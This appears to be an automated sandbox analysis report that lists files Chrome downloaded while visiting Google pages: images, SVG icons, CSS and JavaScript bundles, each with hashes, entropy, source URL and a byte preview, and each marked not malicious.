                                                                                                                                                                                                                                                                                          Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3834
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.903379044234245
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:0iEi7ComEvbKDTQRLGsog+771g4cnBDgMwK:5BGVEvQjg+771gX6MwK
                                                                                                                                                                                                                                                                                          MD5:44B118653A98E27DCA384532CAFB19B1
                                                                                                                                                                                                                                                                                          SHA1:894D27A9BF1B64721287FCC611CFFEA1FA5DF9A9
                                                                                                                                                                                                                                                                                          SHA-256:76E15F7A3637B8A4DF283DFC12B5B11F5C1C1CC6093EEFC061122F1B7B1E57B0
                                                                                                                                                                                                                                                                                          SHA-512:9032EB21220B0FB38F74E2352D582CB90151AD05D88BDE39E579060371A7B225A65ECFA64FFF04BDE27827FD40679AC89F596922724C1109427D4D0643693D96
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/UnRPa94dWPxyhH3faaGqaEQF5uWqRZ2zSARkm18zlnqntO3-bar_Cffb-W5CZdnE7mPWDo7RTqKFJeuMhjYz3eInIpzwiqF9Yxt3JQ=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{t....;#?....@H)m.....;.6!....-..Bi..4......m.P`........x4..m.}...hcI.........&..6!..d.3..C...e=....|.I.4...~.......\.......................z.r'.....-.p.a..lAS`..$..~..m....1..[).W.>...]...e...ap....D.LX....3..7.c..O..q....<O.c....1mG.............DMc.X,...7..F....Wv...J.....@....;...2u4.@_.......9..h*..=.8).p.H............g.K...;.\T.....0..v......=`w...'.x."O.*...@.g..!.D.s...@.wN.n.z.s.NE...4..0.M.|......`.....;.~*..t..W.0..Ws...i,..`...K?eo..._........J...25..g..(s...a.-..z.U*...}e}[...C..@.Rk....]E3..qW.r(........r.v....v<z.5..|...8.Ew....B|...c.....d'.M>..S..h.{..Y8.;..-.O.~w.A...}.?.._'3q..C..[X..S......5..4........l..;....!~.D..[..C|>..>.;#...Xx.LQU..|..&.s..0..B....J{.-.........cnn...y..U:3.jpGp.....Q~...x<........4v...........}.8o.x?.........8.D..8.....n9..q{,..N.i.@....).L]...{3[........W...M.......Ati~...n.w......MC.N../..=V..(....4...n.........]....J....6....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):624
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.522957615284972
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:t4noe350TK5+YGnHV+v9D738dU/skfvMkNIBcXTIs2W1JNuEivimuY:t4oQAGGn1+v93XskftN4cXTIsX1JFI
                                                                                                                                                                                                                                                                                          MD5:FF0B9327F742C8C9B72593D572C7258C
                                                                                                                                                                                                                                                                                          SHA1:0C86A090B503D7AB19F584BDDCEEFD8D0DC2F508
                                                                                                                                                                                                                                                                                          SHA-256:2DDA47A6B513FC3E6ACF6FDA6334495C16A00DF9639854C23E10562B06FF2917
                                                                                                                                                                                                                                                                                          SHA-512:1830B6B85C6413CE2F9C9529BDDBC76C942532D7A660B14B0A09E63DB6883FD42D06E9024F8F29629C1AF97E859D347095E218E253F74816658DFC33426B8D30
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/a3/e5/c6e9a39b42779c36e5daab347acb/leaf-spark-24dp-fill0-wght400-grad0-opsz24.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" height="24px" viewBox="0 -960 960 960" width="24px" fill="#000000"><path d="M560-80q-56 0-105.5-18T364-148l-56 56q-12 12-28 12t-28-12q-12-12-12-28t12-28l56-56q-32-41-50-90.5T240-400q0-138 95.5-229T560-720h320v320q0 62-23.5 120T786-174q-48 47-106 70.5T560-80ZM220-560q0-75 52.5-127.5T400-740q-75 0-127.5-52.5T220-920q0 75-52.5 127.5T40-740q75 0 127.5 52.5T220-560Zm340 400q48 0 92-17.5t78-52.5q35-34 52.5-78t17.5-92v-240H560q-47 0-90.5 18T392-571q-35 34-53.5 78T320-400q0 39 12 74t33 65l207-207q12-12 28-12t28 12q12 12 12 28t-12 28L421-204q29 21 64.5 32.5T560-160Zm0-240Zm0 0Z"/></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1112
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.654338797164083
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:5Di8aDqOI8qiyIeDmNq8GoNCA15LFE1HdHveHQvc:5Di8XxiLeKNq8GxmtGdHvewvc
                                                                                                                                                                                                                                                                                          MD5:F7534A54079C3D58A102D6692939D1F4
                                                                                                                                                                                                                                                                                          SHA1:AF127136E5AEC701FBCE3AF340C7F56F6A0B3493
                                                                                                                                                                                                                                                                                          SHA-256:12ADFB4B80A87613250FD777410ED000EBB3D5B6429C4A09641F6A89F18C5AC2
                                                                                                                                                                                                                                                                                          SHA-512:7F2F81C0F9043A216FF214FE2A851C81E3696EC330584F88FAAF449F43577B30426D5B7207A8EE7AF76772139E8CCBBA5966A146102938671F761F78BF184443
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/KTDOhPuoj2uFXQzWV1UoktTwtuucLM49NAFS07-vtX8dCGhSjpxJwumzTuzI6qZyyqLdmZASs3ARnaI3gIae1MYIjaG57KsmUhit2g=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx...?h.w.....6...."...8$ \...A7..D.....*..v.[..G.."]*...F...V.t..).....S.IZ.... ..I.....<....1.|.{.<..DDDDDDDDDDDDDDDD.\...9.../...H....../....c....n...^l...g.rq..~-.Eb.6..y....`...2I.6...Y.X.p..6I..w..Y..<........f...$=.q...,....../....%.....=.?.<F...l..QRm...;...).s...;...).s...;W...Y/(......f.N..^RJ..<;.==p.$<y....J..........=h..+pK..~s....s>.......g.Z/1.;0...G....p.......e.:.....``.zM..'p.. LM..k.K:.~.[v..y8..zIT..........p...(...e.Z8s..>.....J....&'..M.%.Q.,[..wp...O..y..`.~x.....|4.^I_..:.^...z.)p........%.....).j=~...Y.h....*..m..z.....G.`..J........8..6.z.z.G.!.C..p."...).......E.Gt..........~...........5Q...=7.......K.._.+W`.....S.C....~}..B..?}.....M......{.n6..98~.z.)..CH....g...|..u....W.J...{{af.v.V..y?m...=...7.......`Y..;...).s...;...).s...;...).sy.....'.Y^.?#..82....)...#.Y...n`>..)..Iz..=....;.>I..'+.,s.../..EW..b.L....|.....Um..qg....[B.ho._..QV../.......H..O.b.0..@z"W....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.702058823172319
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:trNj86uCCPUDKwdSJKF0QEtYhKE4R/58ORBKaS:txj86udsmwdAKF0nYhNumPB
                                                                                                                                                                                                                                                                                          MD5:FFAEAE3430F2342BCBEF8EBA3D6F7937
                                                                                                                                                                                                                                                                                          SHA1:18CA92FD70E2C377D58C514FF598A8413628B232
                                                                                                                                                                                                                                                                                          SHA-256:9F2C5988EBF7C6D15B2548F225CF370A9083BACCA79FC202988057F3CEB28606
                                                                                                                                                                                                                                                                                          SHA-512:3672C4E5AC0E73280F24650494D004C6B984D48E90A24F24ECE834AB15FA3A0F17CD3E7D7930B18187B5DC86CD7FB1CCE04BF12DE9D383E333290440F59FC328
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg width="23" height="26" viewBox="0 0 23 26" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.315068 0C0.107123 1.20714 0 2.45143 0 3.71429C0 15.9776 10.1452 25.9257 22.6849 26C22.6849 26 18.274 14.8571 13.863 10.5238C9.45205 6.19048 0.315068 0 0.315068 0Z" fill="#137333"/>.<path d="M22.6849 26C22.8929 24.7929 23 23.5486 23 22.2857C23 10.0224 12.8548 0.0742857 0.315063 0L22.6849 26Z" fill="#82CC52"/>.</svg>.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4232), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4232
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.531069792601157
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:l2IEhgIOafN8fNDzFMqwWgNUIu9ThNpIdgNlLIjeRSbcDNdm7xKAo7:ADHd4tzFlwLNU9xhLIdtjKudi
                                                                                                                                                                                                                                                                                          MD5:DA43A25BD1F9DD99ABEEE97AE6E6BCA6
                                                                                                                                                                                                                                                                                          SHA1:FAF739B5A3ACE85BABEF8AF8C123C7B140D5222A
                                                                                                                                                                                                                                                                                          SHA-256:FC42CAFE3E110C38CB62AB04E51E2F806F308D3ED3F95C9E3AB5D0B7B3C9978A
                                                                                                                                                                                                                                                                                          SHA-512:CB7ABBCBFF96B0B6C7AA9A674C8DB81FD6D3AD3D1F950B08F6F64AE3BC86E0ECD3DDF05C6542CAD98CE5ED59BBF2C1B510B2598064DE0B42DEB051F1CF368DFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/xjs/_/ss/k=xjs.hd.8JyeNrzotDo.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAAAoAHYSAACMAAA2ACAAAAAAAAQAAAMAAAAAAEACAAAABMACAAAAAAAEACASAABAEQAAAACBECAAAAEUQAgQgAQIFEEoBAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAAAARQACBADoIRAABgJhAgAgBPQABAAAAIAAAAJAAAAYAANkAAIAAAAAAADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAQAEAAAAAAAAAAAAAAAAAAAAE/d=1/ed=1/br=1/rs=ACT90oGeXue4vCo29BBNLxd3Hctkci5Jig/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl"
                                                                                                                                                                                                                                                                                          Preview::root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#d2d2d2;--EpFNW:#fff;--IXoxUe:#5e5e5e;--bbQxAb:#474747;--YLNNHc:#1f1f1f;--TMYS9:#0b57d0;--JKqx2:#1a0dab;--rrJJUc:#0b57d0;--mXZkqc:#d2d2d2;--Nsm0ce:#0b57d0;--XKMDxc:#f3f5f6;--aYn2S:#f3f5f6;--Lm570b:#dee1e3}.zJUuqf{margin-bottom:4px}.AB4Wff{margin-left:16px}.OhScic{margin:0px}.v0rrvd{padding-bottom:16px}.zsYMMe{padding:0px}.wHYlTd{font-family:Roboto,Arial,sans-serif;font-size:14px;line-height:22px}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.VDgVie{text-align:center}.TUOsUe{text-align:left}@keyframes g-snackbar-show{from{pointer-events:none;transform:translateY(0)}to{transform:translateY(-100%)}}@keyframes g-snackbar-hide{from{transform:translateY(-100%)}to{transform:translateY(0)}}@keyframes g-snackbar-show-content{from{op
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x1247, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):198498
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999030161032302
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:gEjlaLCMjjdqvqjZ2zjdooS/PLIQwfPbjRqlzaJ0AiGmE5K0R0TqX5dy:xZ/UYyjMzhoTcPjCNlwomX+
                                                                                                                                                                                                                                                                                          MD5:A0E0DCD3477A0F52EC577739224EB8C2
                                                                                                                                                                                                                                                                                          SHA1:237E7DCF1950E40D814ECD6EE952D7C09680C1A4
                                                                                                                                                                                                                                                                                          SHA-256:20FAB2F7F31A7A4FD3E0A3812304DE7FB0FB6DDCC16A7E8C3C39586822F2E22B
                                                                                                                                                                                                                                                                                          SHA-512:AB6A3FF159432A1204368D43BA5E8F20AE7B1989E76905B95880A6BD4E88DD0C1949717A2B51294250BB36D2F2E08F0403BA0D8421917C591552C44886089004
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/24/ff/8f7484584e17923cc26410b00bab/eue-apw-112921-477editcopylarge.webp
                                                                                                                                                                                                                                                                                          Preview:RIFFZ...WEBPVP8 N.... ...*....>m2.F.#$..u*X...enP..............6. .T.+.-]=........G...o..C.G..9.E........q.4...+|..>i.Z............x...Z...../.W....._......K.;....7...>.........J...q.......S.C.....?......}..K._.....Z..........O._............l.[.#.7._...?.z!.w......g.........>u.....g.7..........H.o...O..._...............?.....e.wy$.!...pU.!06.....nC|r.......%iZFh4.Ax.y..4.$..Yj&t.k...~..}.....N.....{..3Q..i.YP2.t!.JXg..n.R.2..K..i...]nH.u'o......S..m.4.........Z..-f$..._.Z.,..bR....lA.....s..!..........*....~.t...... .$.Ss.JI.O..0..3........H2.....D.x...!LM.Rk.......E.9......k...\{?5..]4CA.'.J..KZ..g3q......L..V.i....^..i..+.F.....J.T.\.|....k....?f*......V.N-.... ..%7O...(zy@....]...))@...._..0.._....(.....`$&!..1N..<...}.hFZ{....A..k.S?...pv)8x...&....(...l..'..#.j.........6.}.@...dfZS..Ob...&L.&K].......,.i.....`<.,..._...d$.2va...x..Gq...G..K#..9.y.VB.l....F...:.;..{.T.'.b....g....w?.S.<..%+x....P..L ..Hx7..9..M0gV...c..C.m..Z.....+..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1502
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.73412357563312
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:lPIHicYgNF3utrBMaYdnYuB3EuYksRjf4YooyQGx7sKRMi+R29I/WWWWWWWWWWWj:cdP3ut2aYdN3vsRjGoynxVxuhtG
                                                                                                                                                                                                                                                                                          MD5:8A74358CB7D5C631CB3746D774C99A3E
                                                                                                                                                                                                                                                                                          SHA1:5F33C0ABED63BCFC3630366276FC783AFF20CE67
                                                                                                                                                                                                                                                                                          SHA-256:7281509E4DAC8B2FC498C248C0A61142447362083E2D93657F74C8E5B8942E6F
                                                                                                                                                                                                                                                                                          SHA-512:E1167BC3ACA76887A6549621FBAE88C60FEA554E9D69F6538C2494B32FD246CF19BF02D15FB1C8FFB9E9978B8CA1657CEC792FF1271731CF7C981662EC0722A2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..Ml.U...y}-?.#...**..5R}&...$..B\..p...1.'.\. 1......(.....F.. . .P.(..F.k....w]..".m.;.p.d.Ms.y...{.y`..a..ax'.....(.<0/t..$.....f&/s(v9c!.`..k(.)0;T..$.a. .i..iy...vk........s#....@....H...U..0.J|.,v<*...VQ.].h........w.0....[\....%.Y.\..Eb.u..U\....!...b...).%H.6O.I..]E..M..(|.e..O../...6^&...l.L._..x.`....2.a(L.e..Q.....%z.e.....2.....2.....2...{.e..'.....!.....#.....%x.e.....2.....A..#lw..K.......t.?.....`..&.|8`..-......_.....as.rL.rL.rL.rL.rL.r._&...IN...S..R..i..P..Sj.r5...{`p+...N....P)[.`....B.30.......Od.N.....?..5..Q$..Gq=..~.dK..o..N..................MV..X.].Z.b....s...f...T.l.....u0k.....C..,..EG$.j....?v..,v...<.+x....Zk.r.....\B.)8..A.......f9."O..&../.......<.)..&....Y.....<.....3..?o.B.{KX..`.r.,5..}...Z....j~..m....e.n.*7.._.Q......\.............M....R..%^...Z......r.^=U......P......I.....%.uJ.#..n..#........?=.C...?...N.!`.h.....8v......./.......rK......[!m..+7..7....>.....5
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):25564
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.401392014306985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:mWBk8bQC4itKR5YKEFMVF/rrxT6MB0WY+cdPLfeO54sGnhNhmMNKRitLVfiM3vrD:Qit2Jxk6h23krn
                                                                                                                                                                                                                                                                                          MD5:BA71595D1621DC8F04524135BF1700F6
                                                                                                                                                                                                                                                                                          SHA1:9AF3DC177C84F3ECE52A881228C419C3F1B2C48F
                                                                                                                                                                                                                                                                                          SHA-256:F43A5A76D17FBDBEC6371456B4C93B1078FD0B36EE3FE28AFD1E55ADB0B07771
                                                                                                                                                                                                                                                                                          SHA-512:8653F4117D9ECFAC01F36F5C3CD5A1750BD006F27A0065C2F998E88871B51136591F0761F491CC6A3D5D73B80EF2EF7374A14135EB1DFB4F682D1ABD68AAC9A2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/xjs/_/js/k=xjs.s.en_US.u9kBZBte-Es.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAACBAIEAAAAAABQAAAAAAAAAAAAAAAAAAAAAIBAAgJAQAAACAABwAAAAICAAABAAAAERAAAEiAAAAAgAAAAAAAAAAIgAYAIAAAAAAC4AABAoAgAAEAAAgAEAAIAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAACCEA_AAAAAAAAAAAAAAgAAAAAAAYAAAAAAAAAAIAAAAAQIADAABmAAAAAAAAAAO4DgOABgCGFBQAAAAAAAAAAAAAAAIAEwViQgIIAAAAAAAAAAAAAAAAAAAAAKUETBwg/d=0/dg=0/br=1/rs=ACT90oGlQ_qSjncWQjAN6Nnblp3ZMWaSlA/m=sy1h5,P10Owf,sy17w,sy17t,syte,gSZvdb,sy19e,sy18m,WlNQGd,sytj,sytg,sytf,sytd,sytk,DPreE,sy3pp,sy3po,nabPbb,sy18l,sy18j,syj2,sy175,CnSW2d,kQvlef,sy5jv,fXO0xe?xjs=s4"
                                                                                                                                                                                                                                                                                          Preview:this._s=this._s||{};(function(_){var window=this;.try{._.D3c=_.B("P10Owf",[_.lq]);.}catch(e){_._DumpException(e)}.try{._.x("P10Owf");.var E3c=function(a){_.C.call(this,a.Ka);this.oa=this.getData("cmep").Jb();this.Wb=a.service.Wb;this.data=a.Jf.uQa};_.F(E3c,_.C);E3c.Ha=function(){return{service:{Wb:_.lt},Jf:{uQa:_.tv}}};E3c.prototype.Ca=function(){this.Wb.oa().Aa(this.getRoot().el(),1).log(!0)};E3c.prototype.Ba=function(a){var b;a.data?b=_.Tb(_.tv,a.data):b=new _.tv;F3c(this,b)};E3c.prototype.Aa=function(a){F3c(this,a.data)};.var F3c=function(a,b){var c;(b==null?0:b.XF())&&((c=a.data)==null?0:c.XF())&&(b==null?void 0:b.XF())!==a.data.XF()||a.Wb.oa().Aa(a.getRoot().el(),2).log(!0)};E3c.prototype.Fa=function(a){this.Wb.oa().oa(a.kb.el()).log(!0);_.jf(document,_.nTb)};E3c.prototype.Da=function(a){this.Wb.oa().oa(a.kb.el()).log(!0);if(this.oa){var b;_.jf(document,_.mTb,(b=this.data)==null?void 0:b.serialize())}else _.jf(document,_.lTb,this.data)};_.L(E3c.prototype,"kEOk4d",function(){return
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 686
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):384
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.3873604838406495
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:XtP2c7s5q+e6ZPCNP59HUymZLShVnPs+07KB0w8OmcftOYY4NHkjR:XRNsQ+x2wyIO3Ps+uKBsOmcVOuE9
                                                                                                                                                                                                                                                                                          MD5:628C9C2D9E304C32D6F33C787275A721
                                                                                                                                                                                                                                                                                          SHA1:561C3899CCC24F89DBE86BE16787E523FEDA5747
                                                                                                                                                                                                                                                                                          SHA-256:1B41860D71EA951D1076D47D415211F9D6533F78E711BBBE8D5F8246C46721A2
                                                                                                                                                                                                                                                                                          SHA-512:A6871065461DCF7A864682A5DA34154598195E856607E4CFABBEDEF610635AEEF247DC0C1E9CDD28C7A8E5A52E0F117CA4E36803AA86F123754FA89980EECEC3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/facebook_original.svg
                                                                                                                                                                                                                                                                                          Preview:............M..0....+.p.u...mW.Jh.p...).Jef.[...q.. .....y..q..z;.<...6,..n8....n.ty.......~..X.....x.9._k.O..CU.....b"...<=<^.O.R.......u...h.y......).`n.'_B.0...x...CK..R.r(Y..x.........|.%.4l>.Jk...w~....}.... ..T.so.1f......=..s..kL.."...F......^.P.2..B..I..`#r...R.EK..G+.5........&b...=.G.Km..7.,=....CL...9..Mg$.k.4OH....W..in....s(.2..;==.........ZH+....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x426, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):110046
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.978901269855362
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:tEh+SUiCjNQA97QiSUwwkSBjVBarCHLug+oc:uh+SDCjN9EDUwwzBxKCwoc
                                                                                                                                                                                                                                                                                          MD5:B5CCE833D7CCA691C296543BB9DB8FB3
                                                                                                                                                                                                                                                                                          SHA1:875B05C937AE2A08CDCA61659EA8942CDA68E23E
                                                                                                                                                                                                                                                                                          SHA-256:9ED1CED49C7B004305A59199627D77C7472232E63B791A3F6CD93D0D4E799EDC
                                                                                                                                                                                                                                                                                          SHA-512:A83A3437D05B9378E2B4D856642518CD3DA662216BF7C67F2AFDD01CC5DE8223504C7ED75D2F04D86ECE4B6F24A177901BB06FB54098A5784306CBDEBDB70BF2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF..........................................................................................................................................................."..........................................`.........................!...1."A.#2QaBq..$...3RTbr......CSs.......%4ct....u....5DEd.......6Ue.................................E.........................!1.AQ."aq.2.....#BR.....r$3b.....4C%c..5St............?.........V5......t..~.o.p.L.cS.YW...)~.6?...;_..b.<{.gC..&|).(V..u,.P[.&.v.[w?/..4I.WVj.*......Qm*....ccte.cv..4q.B.ir.........Fji...5..5k..p.wA...$h.+..I/b....v......M..Ax...t^..F.....]n.w.Kn.c.Q.C.....{.~5....t....'-...~..7.p.q..9G.............p.J....q...!...n....{...../p....Y}..dkG,h.p>$p.g_X.v.,.cl.........j.....,...Y2_..,.J(....UU..=...l=qi.!.:..-uB.QQ.M.6sON....a$....TO.N.xy9U...!#.(...,.{.Rzp....}I...<1L..'..7.........).o..|<.h.xda.....o..|..6i.......F{.7..N._r..cqBx...v.Tu[...Z...... .".8...z..M.&=.q...w.....}....*is.v..V:.Rd..*G.s..V).m...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8691
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.966392939246853
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:VPQ2AUtx8hX0Y3ATP9I6b0W1zahIgqVfzEbhzX6zvZ724hTHV:gUtO92Oi0W1oI5VLElGzvZ7pHV
                                                                                                                                                                                                                                                                                          MD5:B194F96127E442BCD553601D72DA4950
                                                                                                                                                                                                                                                                                          SHA1:003FB7E16FF875F8735E324438AD792D4F5B5C7B
                                                                                                                                                                                                                                                                                          SHA-256:3C03DE21A818828C0BC4CA0660C31A2B216BF5090CF4B177DDBF507392A693F1
                                                                                                                                                                                                                                                                                          SHA-512:86FD62B99C25A7866E758BDF1545C9D0671E1AA0B45E027E05F64931E4C651A7DF5DD5594791D9243A1B5FF93F26AC5822DC36A5CC9752D74A015DE6FE096937
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..y.dGu......:..F.iC.$.. ..H......>x...q..1&...61I..|..q...,...=,.-h4..m.2ZfF..,o.....{o..qoo......7..>...s.nU...:u..p..p..p..p.'.r.+p.O{[........!.....nQcL.f........:T........4..HU....}....;.....|.m...\...5......@2q.jC#7...?B9...WD..p......D.1.0..{...[........'..{...c...#..Z..7...C.. ..!U...{...uW\4...X...Z....'.i.....l.P(..\.n.....e..#...L. '|._^.......u.....eo.c...Z#.,w.+.Q...Z5t.r..j.$.u.......ke.w>v.r.....D.W...+.B......^.N.f.+`.}. &......e%........[.6....e.H.1&.....U.HlSQp..y.ay.6....]w.....v...n....#O.~...6..>..u9..1......ax...,..,../..+......(...q.t3n..`x....T.L..r)lM.........7.. ..\.Z.u..\u5.z-...'1.'..-.A.=z....&..OA.0.....}.!..!{6...=....F.l...../..Y.:Ns..|..,......s..NM..@z.aD.O....?.D...{..c.....>)..e....\.|.....~...0..wr..XX..-..~.5._.2z.`,.'.N...{h.............l......./w....ap...O..)..p.....oEg..?.<e{.r.v.X...O..<.l-.]w.~..!.&./;Ey...8M...5r[........6d.i......qr....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1885)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):126135
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.498654960721984
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:AkyvF6US20FCdrgVr3dfPeIofdhIUsTx0wVnX9Mb:AkygUS29rWPeIofdCVnX9Mb
                                                                                                                                                                                                                                                                                          MD5:C299A572DF117831926BC3A0A25BA255
                                                                                                                                                                                                                                                                                          SHA1:673F2AC4C7A41AB95FB14E2687666E81BC731E95
                                                                                                                                                                                                                                                                                          SHA-256:F847294692483E4B7666C0F98CBE2BD03B86AE27B721CAE332FEB26223DDE9FC
                                                                                                                                                                                                                                                                                          SHA-512:B418A87A350DBC0DEF9FAF3BE4B910CB21AE6FFFC6749EECEA486E3EB603F5AF92F70B936C3D440009482EDE572EE9736422CF89DCDD2B758DFA829216049179
                                                                                                                                                                                                                                                                                          Malicious:false
